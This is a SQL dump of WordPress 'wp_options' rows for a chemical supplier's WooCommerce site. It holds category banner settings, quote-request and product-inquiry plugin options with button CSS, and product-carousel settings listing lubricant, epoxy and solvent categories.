INSERT INTO `wp_options` VALUES (4007, 'taxonomy_term_40', 'a:5:{s:13:"banner_url_id";s:4:"1179";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}', 'yes'); 
INSERT INTO `wp_options` VALUES (4015, 'taxonomy_term_116', 'a:5:{s:13:"banner_url_id";s:4:"1179";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}', 'yes'); 
INSERT INTO `wp_options` VALUES (4032, 'taxonomy_term_37', 'a:5:{s:13:"banner_url_id";s:4:"1179";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}', 'yes'); 
INSERT INTO `wp_options` VALUES (4103, 'taxonomy_term_34', 'a:5:{s:13:"banner_url_id";s:4:"1179";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}', 'yes'); 
INSERT INTO `wp_options` VALUES (4105, 'taxonomy_term_46', 'a:5:{s:13:"banner_url_id";s:4:"1179";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}', 'yes'); 
INSERT INTO `wp_options` VALUES (4112, 'taxonomy_term_45', 'a:5:{s:13:"banner_url_id";s:4:"1179";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}', 'yes'); 
INSERT INTO `wp_options` VALUES (4114, 'taxonomy_term_35', 'a:5:{s:13:"banner_url_id";s:4:"1179";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}', 'yes'); 
INSERT INTO `wp_options` VALUES (4116, 'taxonomy_term_86', 'a:5:{s:13:"banner_url_id";s:4:"1179";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}', 'yes'); 
INSERT INTO `wp_options` VALUES (4118, 'taxonomy_term_99', 'a:5:{s:13:"banner_url_id";s:4:"1179";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}', 'yes'); 
INSERT INTO `wp_options` VALUES (5318, 'taxonomy_term_128', 'a:5:{s:13:"banner_url_id";s:0:"";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}', 'yes'); 
INSERT INTO `wp_options` VALUES (5606, 'wpdb_term_image_version', '201607130001', 'yes'); 
INSERT INTO `wp_options` VALUES (5620, 'taxonomy_term_38', 'a:5:{s:13:"banner_url_id";s:4:"1179";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}', 'yes'); 
INSERT INTO `wp_options` VALUES (5772, 'taxonomy_term_36', 'a:5:{s:13:"banner_url_id";s:4:"1179";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}', 'yes'); 
INSERT INTO `wp_options` VALUES (5789, 'taxonomy_term_13', 'a:5:{s:13:"banner_url_id";s:3:"867";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}', 'yes'); 
INSERT INTO `wp_options` VALUES (5840, 'taxonomy_term_130', 'a:5:{s:13:"banner_url_id";s:4:"1179";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}', 'yes'); 
INSERT INTO `wp_options` VALUES (6010, 'taxonomy_term_131', 'a:5:{s:13:"banner_url_id";s:4:"1179";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}', 'yes'); 
INSERT INTO `wp_options` VALUES (6018, 'taxonomy_term_39', 'a:5:{s:13:"banner_url_id";s:4:"1179";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}', 'yes'); 
INSERT INTO `wp_options` VALUES (6061, 'taxonomy_term_8', 'a:5:{s:13:"banner_url_id";s:0:"";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}', 'yes'); 
INSERT INTO `wp_options` VALUES (6259, 'taxonomy_term_79', 'a:5:{s:13:"banner_url_id";s:4:"1179";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}', 'yes'); 
INSERT INTO `wp_options` VALUES (6266, 'taxonomy_term_144', 'a:5:{s:13:"banner_url_id";s:0:"";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}', 'yes'); 
INSERT INTO `wp_options` VALUES (6309, 'wc_remove_product_sorting', 'a:0:{}', 'yes'); 
INSERT INTO `wp_options` VALUES (6328, 'widget_wpadm_counter_widget', 'a:2:{s:12:"_multiwidget";i:1;i:2;a:1:{s:5:"title";s:13:"WPADM Counter";}}', 'yes'); 
INSERT INTO `wp_options` VALUES (6344, 'taxonomy_term_145', 'a:5:{s:13:"banner_url_id";s:0:"";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}', 'yes'); 
INSERT INTO `wp_options` VALUES (6379, 'taxonomy_term_143', 'a:5:{s:13:"banner_url_id";s:4:"1179";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}', 'yes'); 
INSERT INTO `wp_options` VALUES (6413, 'adq_quotelist_page_id', '927', 'yes'); 
INSERT INTO `wp_options` VALUES (6414, 'adq_enable_guest_request', 'yes', 'yes'); 
INSERT INTO `wp_options` VALUES (6415, 'adq_enable_login_reminder', 'yes', 'yes'); 
INSERT INTO `wp_options` VALUES (6416, 'adq_enable_registration', 'yes', 'yes'); 
INSERT INTO `wp_options` VALUES (6417, 'adq_proposal_validity', '15', 'no'); 
INSERT INTO `wp_options` VALUES (6418, 'adq_proposal_reminder', '1', 'no'); 
INSERT INTO `wp_options` VALUES (6419, 'adq_enable_pay_button', 'yes', 'yes'); 
INSERT INTO `wp_options` VALUES (6420, 'adq_display_discount', 'no', 'yes'); 
INSERT INTO `wp_options` VALUES (6421, 'adq_redirect_quote_page', 'yes', 'no'); 
INSERT INTO `wp_options` VALUES (6422, 'adq_redirect_payment', 'yes', 'no'); 
INSERT INTO `wp_options` VALUES (6423, 'adq_url_redirect_payment', '', 'no'); 
INSERT INTO `wp_options` VALUES (6424, 'adq_redirect_after_quote', '', 'no'); 
INSERT INTO `wp_options` VALUES (6425, 'adq_automatic_proposal', 'no', 'yes'); 
INSERT INTO `wp_options` VALUES (6426, 'adq_coupons_enabled', 'yes', 'yes'); 
INSERT INTO `wp_options` VALUES (6427, 'adq_ajax_error_tolerance', 'yes', 'yes'); 
INSERT INTO `wp_options` VALUES (6428, 'adq_disable_checkout_hooks', 'no', 'yes'); 
INSERT INTO `wp_options` VALUES (6429, 'adq_visibility_quote', 'a:9:{i:0;s:13:"administrator";i:1;s:6:"editor";i:2;s:6:"author";i:3;s:11:"contributor";i:4;s:10:"subscriber";i:5;s:8:"customer";i:6;s:12:"shop_manager";i:7;s:12:"unregistered";i:8;s:8:"loggedin";}', 'yes'); 
INSERT INTO `wp_options` VALUES (6430, 'adq_visibility_price', 'a:0:{}', 'yes'); 
INSERT INTO `wp_options` VALUES (6431, 'adq_visibility_cart', 'a:0:{}', 'yes'); 
INSERT INTO `wp_options` VALUES (6433, 'adq_general_quote_loop', 'yes', 'yes'); 
INSERT INTO `wp_options` VALUES (6434, 'adq_quote_text', 'Add to quote', 'yes'); 
INSERT INTO `wp_options` VALUES (6436, 'adq_taxonomy_filter', '', 'yes'); 
INSERT INTO `wp_options` VALUES (6438, 'adq_custom_text_shipping', 'I want Quote Request for Shipping', 'no'); 
INSERT INTO `wp_options` VALUES (6440, 'adq_inherit_shipping_conf', 'no', 'yes'); 
INSERT INTO `wp_options` VALUES (6441, 'adq_enable_shipping', 'no', 'yes'); 
INSERT INTO `wp_options` VALUES (6442, 'adq_hide_shipping_costs', 'no', 'yes'); 
INSERT INTO `wp_options` VALUES (6443, 'adq_billing_first_name_visible', 'no', 'yes'); 
INSERT INTO `wp_options` VALUES (6444, 'adq_billing_first_name_required', 'no', 'yes'); 
INSERT INTO `wp_options` VALUES (6445, 'adq_billing_last_name_visible', 'no', 'yes'); 
INSERT INTO `wp_options` VALUES (6446, 'adq_billing_last_name_required', 'no', 'yes'); 
INSERT INTO `wp_options` VALUES (6447, 'adq_billing_company_visible', 'no', 'yes'); 
INSERT INTO `wp_options` VALUES (6448, 'adq_billing_company_required', 'no', 'yes'); 
INSERT INTO `wp_options` VALUES (6449, 'adq_billing_phone_visible', 'no', 'yes'); 
INSERT INTO `wp_options` VALUES (6450, 'adq_billing_phone_required', 'no', 'yes'); 
INSERT INTO `wp_options` VALUES (6451, 'adq_billing_country_visible', 'no', 'yes'); 
INSERT INTO `wp_options` VALUES (6452, 'adq_billing_country_required', 'no', 'yes'); 
INSERT INTO `wp_options` VALUES (6453, 'adq_billing_address_1_visible', 'no', 'yes'); 
INSERT INTO `wp_options` VALUES (6454, 'adq_billing_address_1_required', 'no', 'yes'); 
INSERT INTO `wp_options` VALUES (6455, 'adq_billing_address_2_visible', 'no', 'yes'); 
INSERT INTO `wp_options` VALUES (6456, 'adq_billing_address_2_required', 'no', 'yes'); 
INSERT INTO `wp_options` VALUES (6457, 'adq_billing_city_visible', 'no', 'yes'); 
INSERT INTO `wp_options` VALUES (6458, 'adq_billing_city_required', 'no', 'yes'); 
INSERT INTO `wp_options` VALUES (6461, 'adq_billing_postcode_visible', 'no', 'yes'); 
INSERT INTO `wp_options` VALUES (6462, 'adq_billing_postcode_required', 'no', 'yes'); 
INSERT INTO `wp_options` VALUES (6463, 'adq_contact_form', '', 'yes'); 
INSERT INTO `wp_options` VALUES (6464, 'adq_allow_product_comments', 'yes', 'yes'); 
INSERT INTO `wp_options` VALUES (6465, 'adq_allow_order_comments', 'yes', 'yes'); 
INSERT INTO `wp_options` VALUES (6468, 'adq_allow_order_comments_history', 'no', 'yes'); 
INSERT INTO `wp_options` VALUES (6479, 'widget_woocommerce_widget_quote', 'a:1:{s:12:"_multiwidget";i:1;}', 'yes'); 
INSERT INTO `wp_options` VALUES (6481, 'adq_next_execution_cron', '1472342400', 'yes'); 
INSERT INTO `wp_options` VALUES (6492, 'taxonomy_term_149', 'a:5:{s:13:"banner_url_id";s:4:"1223";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}', 'yes'); 
INSERT INTO `wp_options` VALUES (6501, 'taxonomy_term_150', 'a:5:{s:13:"banner_url_id";s:0:"";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}', 'yes'); 
INSERT INTO `wp_options` VALUES (6668, 'wdm_form_data', 'a:31:{s:20:"enable_disable_quote";s:1:"0";s:20:"only_if_out_of_stock";s:1:"0";s:20:"show_enquiry_on_shop";s:1:"0";s:18:"enable_disable_mpe";s:1:"0";s:13:"mpe_cart_page";s:0:"";s:13:"redirect_user";s:60:"https://www.miller-stephenson.com/thank-you-for-your-inquiry";s:12:"custom_label";s:22:"Price Quote or Inquiry";s:9:"pos_radio";s:18:"show_after_summary";s:19:"show_button_as_link";s:1:"1";s:21:"enable_send_mail_copy";s:1:"1";s:26:"enable_telephone_no_txtbox";s:1:"1";s:20:"make_phone_mandatory";s:1:"0";s:13:"phone_country";s:0:"";s:10:"user_email";s:81:"ddillulio@mschem.com,cpavlik@mschem.com,wmarotta@mschem.com,zchowdhury@mschem.com";s:18:"send_mail_to_admin";s:1:"1";s:19:"send_mail_to_author";s:1:"1";s:11:"default_sub";s:23:"MS WEB: Product Inquiry";s:15:"user_custom_css";s:1053:"a[id*=\'wdm-quoteup-trigger\'] {\r\n  background: #3498db;\r\n  background-image: -webkit-linear-gradient(top, #3498db, #2980b9);\r\n  background-image: -moz-linear-gradient(top, #3498db, #2980b9);\r\n  background-image: -ms-linear-gradient(top, #3498db, #2980b9);\r\n  background-image: -o-linear-gradient(top, #3498db, #2980b9);\r\n  background-image: linear-gradient(to bottom, #3498db, #2980b9);\r\n  -webkit-border-radius: 28;\r\n  -moz-border-radius: 28;\r\n  border-radius: 28px;\r\n  text-shadow: 1px 1px 3px #666666;\r\n  font-family: Arial;\r\n  color: #ffffff;\r\n  font-size: 16px;\r\n  padding: 5px 20px 5px 20px;\r\n  text-decoration: none;\r\n\r\n}\r\n\r\na[id*=\'wdm-quoteup-trigger\']:hover {\r\n  background: #3cb0fd;\r\n  background-image: -webkit-linear-gradient(top, #3cb0fd, #3498db);\r\n  background-image: -moz-linear-gradient(top, #3cb0fd, #3498db);\r\n  background-image: -ms-linear-gradient(top, #3cb0fd, #3498db);\r\n  background-image: -o-linear-gradient(top, #3cb0fd, #3498db);\r\n  background-image: linear-gradient(to bottom, #3cb0fd, #3498db);\r\n  text-decoration: none;\r\n\r\n}";s:10:"button_CSS";s:10:"manual_css";s:11:"start_color";s:7:"#1e73be";s:9:"end_color";s:7:"#ebe9eb";s:17:"button_text_color";s:7:"#ffffff";s:19:"button_border_color";s:7:"#ebe9eb";s:12:"dialog_color";s:7:"#ffffff";s:20:"dialog_product_color";s:4:"#999";s:17:"dialog_text_color";s:4:"#333";s:12:"company_name";s:27:"Miller-Stephenson Chemicals";s:13:"company_email";s:21:"zchowdhury@mschem.com";s:15:"company_address";s:35:"55 Backus Ave.\r\nDanbury, CT 06810\r\n";s:12:"company_logo";s:88:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/mslogo-1-e1471289515793.png";s:23:"approval_rejection_page";s:0:"";}', 'yes'); 
INSERT INTO `wp_options` VALUES (7192, 'taxonomy_term_155', 'a:5:{s:13:"banner_url_id";s:0:"";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}', 'yes'); 
INSERT INTO `wp_options` VALUES (7249, 'taxonomy_term_160', 'a:5:{s:13:"banner_url_id";s:4:"1179";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}', 'yes'); 
INSERT INTO `wp_options` VALUES (7525, 'taxonomy_term_168', 'a:5:{s:13:"banner_url_id";s:4:"1179";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}', 'yes'); 
INSERT INTO `wp_options` VALUES (7606, 'taxonomy_term_174', 'a:5:{s:13:"banner_url_id";s:0:"";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}', 'yes'); 
INSERT INTO `wp_options` VALUES (7618, 'taxonomy_term_170', 'a:5:{s:13:"banner_url_id";s:4:"1179";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}', 'yes'); 
INSERT INTO `wp_options` VALUES (7628, 'taxonomy_term_169', 'a:5:{s:13:"banner_url_id";s:4:"1179";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}', 'yes'); 
INSERT INTO `wp_options` VALUES (7710, 'taxonomy_term_165', 'a:5:{s:13:"banner_url_id";s:4:"1179";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}', 'yes'); 
INSERT INTO `wp_options` VALUES (7965, 'taxonomy_term_16', 'a:5:{s:13:"banner_url_id";s:4:"1208";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}', 'yes'); 
INSERT INTO `wp_options` VALUES (7982, 'taxonomy_term_21', 'a:5:{s:13:"banner_url_id";s:4:"1200";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}', 'yes'); 
INSERT INTO `wp_options` VALUES (8081, 'taxonomy_term_171', 'a:5:{s:13:"banner_url_id";s:4:"1179";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}', 'yes'); 
INSERT INTO `wp_options` VALUES (8431, 'taxonomy_term_151', 'a:5:{s:13:"banner_url_id";s:0:"";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}', 'yes'); 
INSERT INTO `wp_options` VALUES (8775, 'taxonomy_term_11', 'a:5:{s:13:"banner_url_id";s:4:"1232";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}', 'yes'); 
INSERT INTO `wp_options` VALUES (8799, 'taxonomy_term_227', 'a:5:{s:13:"banner_url_id";s:0:"";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}', 'yes'); 
INSERT INTO `wp_options` VALUES (9350, 'taxonomy_term_156', 'a:5:{s:13:"banner_url_id";s:4:"1179";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}', 'yes'); 
INSERT INTO `wp_options` VALUES (9570, 'taxonomy_term_20', 'a:5:{s:13:"banner_url_id";s:4:"1210";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}', 'yes'); 
INSERT INTO `wp_options` VALUES (9607, 'taxonomy_term_180', 'a:5:{s:13:"banner_url_id";s:0:"";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}', 'yes'); 
INSERT INTO `wp_options` VALUES (9609, 'taxonomy_term_181', 'a:5:{s:13:"banner_url_id";s:0:"";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}', 'yes'); 
INSERT INTO `wp_options` VALUES (9707, 'taxonomy_term_129', 'a:5:{s:13:"banner_url_id";s:0:"";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}', 'yes'); 
INSERT INTO `wp_options` VALUES (9712, 'taxonomy_term_229', 'a:5:{s:13:"banner_url_id";s:0:"";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}', 'yes'); 
INSERT INTO `wp_options` VALUES (10098, 'taxonomy_term_10', 'a:5:{s:13:"banner_url_id";s:4:"1238";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}', 'yes'); 
INSERT INTO `wp_options` VALUES (10130, 'taxonomy_term_24', 'a:5:{s:13:"banner_url_id";s:4:"1237";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}', 'yes'); 
INSERT INTO `wp_options` VALUES (10134, 'taxonomy_term_23', 'a:5:{s:13:"banner_url_id";s:4:"1239";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}', 'yes'); 
INSERT INTO `wp_options` VALUES (10138, 'taxonomy_term_25', 'a:5:{s:13:"banner_url_id";s:4:"1240";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}', 'yes'); 
INSERT INTO `wp_options` VALUES (10142, 'taxonomy_term_26', 'a:5:{s:13:"banner_url_id";s:4:"1241";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}', 'yes'); 
INSERT INTO `wp_options` VALUES (10146, 'taxonomy_term_22', 'a:5:{s:13:"banner_url_id";s:4:"1242";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}', 'yes'); 
INSERT INTO `wp_options` VALUES (10150, 'taxonomy_term_12', 'a:5:{s:13:"banner_url_id";s:4:"1244";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}', 'yes'); 
INSERT INTO `wp_options` VALUES (10444, 'taxonomy_term_232', 'a:5:{s:13:"banner_url_id";s:0:"";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}', 'yes'); 
INSERT INTO `wp_options` VALUES (10477, 'taxonomy_term_231', 'a:5:{s:13:"banner_url_id";s:0:"";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}', 'yes'); 
INSERT INTO `wp_options` VALUES (10633, 'taxonomy_term_246', 'a:5:{s:13:"banner_url_id";s:0:"";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}', 'yes'); 
INSERT INTO `wp_options` VALUES (11355, 'gsc_woo_options', 'a:31:{s:21:"gsc_woo_upsell_off_on";i:0;s:23:"gsc_upsell_woo_autoplay";s:4:"true";s:14:"upsell_au_time";s:1:"5";s:18:"gsc_upsell_woo_nav";s:4:"true";s:19:"gsc_upsell_woo_page";s:4:"true";s:13:"gsc_upsell_fw";s:5:"false";s:14:"upsell_pro_gap";s:2:"10";s:11:"desktop_pro";s:1:"3";s:10:"tablet_pro";s:1:"2";s:10:"mobile_pro";s:1:"1";s:25:"gsc_woo_crosssells_off_on";i:0;s:27:"gsc_crosssells_woo_autoplay";s:4:"true";s:18:"crosssells_au_time";s:1:"5";s:22:"gsc_crosssells_woo_nav";s:4:"true";s:23:"gsc_crosssells_woo_page";s:4:"true";s:18:"crosssells_pro_gap";s:2:"10";s:22:"crosssells_desktop_pro";s:1:"3";s:21:"crosssells_tablet_pro";s:1:"2";s:21:"crosssells_mobile_pro";s:1:"1";s:22:"gsc_woo_related_off_on";i:0;s:24:"gsc_related_woo_autoplay";s:4:"true";s:15:"related_au_time";s:1:"5";s:19:"gsc_related_woo_nav";s:4:"true";s:20:"gsc_related_woo_page";s:4:"true";s:14:"gsc_related_fw";s:5:"false";s:15:"related_pro_gap";s:2:"10";s:17:"related_total_pro";s:1:"6";s:19:"related_desktop_pro";s:1:"3";s:18:"related_tablet_pro";s:1:"2";s:18:"related_mobile_pro";s:1:"1";s:0:"";N;}', 'yes'); 
INSERT INTO `wp_options` VALUES (11356, 'widget_gsc_woo_widget', 'a:1:{s:12:"_multiwidget";i:1;}', 'yes'); 
INSERT INTO `wp_options` VALUES (11408, 'wa_wps_version', '1.2', 'yes'); 
INSERT INTO `wp_options` VALUES (11409, 'wa_wps_settings', 'a:34:{s:13:"display_image";b:1;s:16:"display_controls";b:0;s:17:"display_read_more";b:1;s:13:"display_title";b:1;s:15:"display_excerpt";b:1;s:13:"display_price";b:0;s:19:"display_add_to_cart";b:0;s:18:"display_pagination";b:0;s:10:"image_size";s:6:"medium";s:11:"auto_scroll";b:0;s:8:"circular";b:0;s:10:"word_limit";s:2:"30";s:14:"read_more_text";s:9:"Read more";s:8:"category";a:80:{i:0;s:20:"heloxy-flexibilizers";i:1;s:15:"opteon-solvents";i:2;s:38:"heloxy-poly-functional-glycidyl-ethers";i:3;s:16:"vertrel-solvents";i:4;s:27:"krytox-tribosys-finish-line";i:5;s:17:"krytox-lubricants";i:6;s:10:"gpl-series";i:7;s:11:"gpl-greases";i:8;s:11:"gpl-200-207";i:9;s:11:"gpl-210-217";i:10;s:11:"gpl-220-227";i:11;s:8:"gpl-oils";i:12;s:17:"krytox-gpl-grease";i:13;s:25:"aerospace-aviation-series";i:14;s:26:"aerospace-aviation-greases";i:15;s:10:"240-series";i:16;s:10:"250-series";i:17;s:10:"283-series";i:18;s:23:"aerospace-aviation-oils";i:19;s:30:"electronic-grade-krytox-grease";i:20;s:17:"xht-series-krytox";i:21;s:11:"xht-greases";i:22;s:13:"xht-ac-series";i:23;s:13:"xht-bd-series";i:24;s:12:"xht-s-series";i:25;s:8:"xht-oils";i:26;s:10:"aut-series";i:27;s:10:"lvp-series";i:28;s:10:"nrt-series";i:29;s:15:"nrt-8900-series";i:30;s:15:"nrt-plss-series";i:31;s:10:"fsh-series";i:32;s:25:"ts4-krytox-thread-sealant";i:33;s:13:"krytox-xp-oil";i:34;s:16:"krytox-xp-grease";i:35;s:14:"krytox-xp-oils";i:36;s:17:"krytox-fpg-grease";i:37;s:10:"vpf-krytox";i:38;s:8:"tribosys";i:39;s:11:"finish-line";i:40;s:19:"epoxy-resin-systems";i:41;s:25:"epoxy-adhesive-kit-ms-907";i:42;s:27:"eponex-cycloaliphatic-resin";i:43;s:31:"epirez-waterborne-resin-epi-rez";i:44;s:10:"epon-epoxy";i:45;s:36:"epon-elastomer-modified-epoxy-resins";i:46;s:33:"epon-electrical-laminating-resins";i:47;s:19:"epoxy-polyacrylates";i:48;s:25:"epon-epoxy-novolac-resins";i:49;s:23:"epon-solid-epoxy-resins";i:50;s:23:"epon-epoxy-resin-blends";i:51;s:26:"epon-solid-epoxy-solutions";i:52;s:28:"modified-liquid-epoxy-resins";i:53;s:30:"unmodified-liquid-epoxy-resins";i:54;s:21:"epikure-curing-agents";i:55;s:31:"epikure-3000-series-amidoamines";i:56;s:30:"epikure-3100-series-polyamides";i:57;s:35:"epikure-200-series-aliphatic-amines";i:58;s:41:"epikure-3300-series-cycloaliphatic-amines";i:59;s:20:"epikure-w-composites";i:60;s:32:"heloxyepoxy-functional-modifiers";i:61;s:47:"heloxy-monofunctional-aliphatic-glycidyl-ethers";i:62;s:46:"heloxy-monofunctional-aromatic-glycidyl-ethers";i:63;s:28:"epoxy-stripping-agent-ms-111";i:64;s:18:"specialty-products";i:65;s:18:"conformal-coatings";i:66;s:25:"acrylic-conformal-coating";i:67;s:26:"conformal-coating-stripper";i:68;s:18:"protective-varnish";i:69;s:26:"silicone-confromal-coating";i:70;s:26:"urethane-conformal-coating";i:71;s:17:"medical-chemicals";i:72;s:14:"release-agents";i:73;s:14:"semi-permanent";i:74;s:18:"ptfe-release-agent";i:75;s:16:"high-temperature";i:76;s:8:"solvents";i:77;s:16:"contact-cleaners";i:78;s:28:"plastic-metal-glass-cleaners";i:79;s:4:"vazo";}s:26:"number_of_posts_to_display";s:2:"10";s:11:"posts_order";s:4:"desc";s:13:"posts_orderby";s:2:"id";s:2:"fx";s:4:"none";s:13:"easing_effect";s:6:"linear";s:7:"timeout";s:4:"3000";s:8:"infinite";b:1;s:10:"item_align";s:6:"center";s:10:"item_width";s:3:"180";s:11:"item_height";s:3:"350";s:12:"excerpt_type";b:0;s:11:"touch_swipe";b:0;s:14:"css_transition";b:0;s:9:"direction";s:4:"left";s:13:"arrows_colour";s:12:"rgb(0, 0, 0)";s:16:"arrows_bg_colour";s:20:"rgba(168, 32, 32, 0)";s:19:"arrows_hover_colour";s:18:"rgb(170, 170, 170)";s:24:"size_of_direction_arrows";s:2:"32";s:17:"default_image_url";s:0:"";s:10:"custom_css";s:0:"";}', 'no'); 
INSERT INTO `wp_options` VALUES (11410, 'wa_wps_configuration', 'a:6:{s:19:"deactivation_delete";b:0;s:13:"loading_place";s:6:"header";s:16:"load_touch_swipe";b:1;s:11:"load_jquery";b:0;s:12:"load_transit";b:1;s:17:"load_caroufredsel";b:1;}', 'no'); 
INSERT INTO `wp_options` VALUES (11411, 'widget_wps_widget', 'a:1:{s:12:"_multiwidget";i:1;}', 'yes'); 
INSERT INTO `wp_options` VALUES (11740, 'wc_glt_default', 'grid', 'yes'); 
INSERT INTO `wp_options` VALUES (11760, 'widget_berocket_lgv_widget', 'a:1:{s:12:"_multiwidget";i:1;}', 'yes'); 
INSERT INTO `wp_options` VALUES (12074, 'dp_needs_pages', '1', 'yes'); 
INSERT INTO `wp_options` VALUES (12079, 'dp_replace_woo_page', '0', 'yes'); 
INSERT INTO `wp_options` VALUES (12080, 'dp_product_shop_page', 'disable', 'yes'); 
INSERT INTO `wp_options` VALUES (12081, 'dp_product_category_page', 'disable', 'yes'); 
INSERT INTO `wp_options` VALUES (12082, 'dp_product_tag_page', 'disable', 'yes'); 
